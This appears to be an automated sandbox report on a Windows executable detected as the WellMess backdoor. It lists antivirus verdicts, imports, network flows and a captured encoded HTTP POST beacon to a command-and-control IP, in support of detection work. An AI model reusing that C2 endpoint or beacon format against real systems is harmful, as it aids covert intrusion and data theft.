3.6
中危

95193266e37a3401a0becace6d41171ab2968ed5289d666043251d05552d02fc

d7817bc8fc539fba6388907223773546.exe

分析耗时

33s

最近分析

文件大小

6.5MB
静态报毒 动态报毒 100% AI SCORE=87 ARTEMIS CONFIDENCE FOZO GENERICKD HMXMO HPQOUM MALICIOUS MALWARE@#Y5ZCEAT6N74 MULTIOS REDCAP S15499799 SCORE SIGGEN9 SUSGEN UNSAFE WELLMESS WRZT YAAG 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/WellMess.fe2ca1cd 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Kingsoft 20201001 2013.8.14.323
McAfee Artemis!D7817BC8FC53 20201001 6.0.6.653
Tencent Win32.Trojan.Go.Wrzt 20201001 1.0.0.1
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
行为判定
动态指标
Encryption keys have been identified in this analysis
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://178.211.39.6:80/
Performs some HTTP requests (1 个事件)
request POST http://178.211.39.6:80/
Sends data using the HTTP POST Method (1 个事件)
request POST http://178.211.39.6:80/
网络通信
Communicates with host for which no DNS query was performed (2 个事件)
host 172.217.24.14
host 178.211.39.6
File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 个事件)
DrWeb Trojan.Siggen9.63109
MicroWorld-eScan Trojan.GenericKD.43562778
FireEye Trojan.GenericKD.43562778
CAT-QuickHeal Trojan.WellMess.S15499799
ALYac Trojan.Agent.WellMess
Cylance Unsafe
Zillya Trojan.WellMess.Win32.3
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/WellMess.fe2ca1cd
K7GW Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D298B71A
Invincea Mal/Generic-S
Cyren W64/Trojan.FOZO-0575
Symantec Backdoor.Wellmess!g1
APEX Malicious
Paloalto generic.ml
ClamAV Multios.Trojan.WellMess-9387521-0
Kaspersky HEUR:Trojan.Win32.Go.WellMess
BitDefender Trojan.GenericKD.43562778
NANO-Antivirus Trojan.Win64.Go.hpqoum
Ad-Aware Trojan.GenericKD.43562778
Sophos Mal/Generic-S
Comodo Malware@#y5zceat6n74
F-Secure Trojan.TR/Redcap.hmxmo
VIPRE Trojan.Win32.Generic!BT
TrendMicro Trojan.Win64.WELLMESS.YAAG-A
McAfee-GW-Edition BehavesLike.Win64.Trojan.vh
Emsisoft Trojan.GenericKD.43562778 (B)
Avira TR/Redcap.hmxmo
Antiy-AVL Trojan/Win32.Go
Microsoft Trojan:Win32/WellMess.B!MTB
AegisLab Trojan.Win32.Go.4!c
ZoneAlarm HEUR:Trojan.Win32.Go.WellMess
GData Trojan.GenericKD.43562778
Cynet Malicious (score: 85)
McAfee Artemis!D7817BC8FC53
MAX malware (ai score=87)
VBA32 Trojan.Go
Malwarebytes Backdoor.WellMess.GO
ESET-NOD32 a variant of Win32/WellMess.A
TrendMicro-HouseCall Trojan.Win64.WELLMESS.YAAG-A
Tencent Win32.Trojan.Go.Wrzt
Ikarus Trojan.Win32.WellMess
MaxSecure Trojan.Malware.102610986.susgen
Fortinet W32/WellMess.A!tr
Webroot W32.Trojan.Gen
AVG Win64:Trojan-gen
CrowdStrike win/malicious_confidence_100% (W)
Qihoo-360 Win32/Trojan.34c
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1970-01-01 08:00:00

Imports

Library KERNEL32.DLL:
0x7e3020 WriteFile
0x7e3028 WriteConsoleW
0x7e3030 WaitForSingleObject
0x7e3038 VirtualFree
0x7e3040 VirtualAlloc
0x7e3048 SwitchToThread
0x7e3050 SuspendThread
0x7e3058 SetWaitableTimer
0x7e3068 SetThreadPriority
0x7e3078 SetEvent
0x7e3080 SetErrorMode
0x7e3090 ResumeThread
0x7e3098 LoadLibraryA
0x7e30a0 LoadLibraryW
0x7e30a8 GetThreadContext
0x7e30b0 GetSystemInfo
0x7e30b8 GetStdHandle
0x7e30d0 GetProcAddress
0x7e30e0 GetConsoleMode
0x7e30f0 ExitProcess
0x7e30f8 DuplicateHandle
0x7e3108 CreateThread
0x7e3118 CreateEventA
0x7e3120 CloseHandle
Library winmm.dll:
0x7e3000 timeBeginPeriod
Library ws2_32.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49178 178.211.39.6 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58370 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 62192 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://178.211.39.6:80/
POST / HTTP/1.1
Host: 178.211.39.6:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
Content-Length: 421
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cookie: KbZEpUiJ=0M4e+gpr+SzMvVmP+YPRaMN%3A+t0C7+87o+rXn7ZqS+zcX2T+gzEyg%3A5.+GvUR+hpE+dSiNJA+JdaWje+MxZF+c8Mt+%2CfLfNP+sVC.+%3Ao5j0bn+BYI0fhy+%3AIxpP+P; tdz1OjbG=WOh21+Tu6it+BQ5ip%2C+bVe%3Av+wFdiZ.+GpJQ+e8w+a9iRlC%3A+rPwxPBg++++++
Accept-Encoding: gzip

SFG Klv P2RvFMt 8l5 l,Oerv Zwb tkUnQwa R6Bs8kC 4gMH3C. DEgi3 58lJe2 K54 ,5:u1 KqD0UA Oss8:J Ofddf8 EuD0LbT. FltkmL: :ER,U IsB h6XMOb bWR BJCgzfa R9D50h lbjMg. C1G41u0 uKg24vz 3Cg ZnF MdgS Z5hKgA1 uoFZwa2 d2YRGFG. 8X4vJ BJlJzP W:g 0ZGpU tlDL9 rpF aCFX7b sBh6Vw3. z8m0z x:nf3QE 2oKDp fIliRp 1oFPk05 diFK AhGgqL dHcofc. HM8XbUM 2biO zzu57P A09G0 aAi 75sT CpRo AlO. V2SnR4I cQYVA :nDkc OE1, cK4 NDb C5aJ9Y PvkO. zA0eB8A      

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.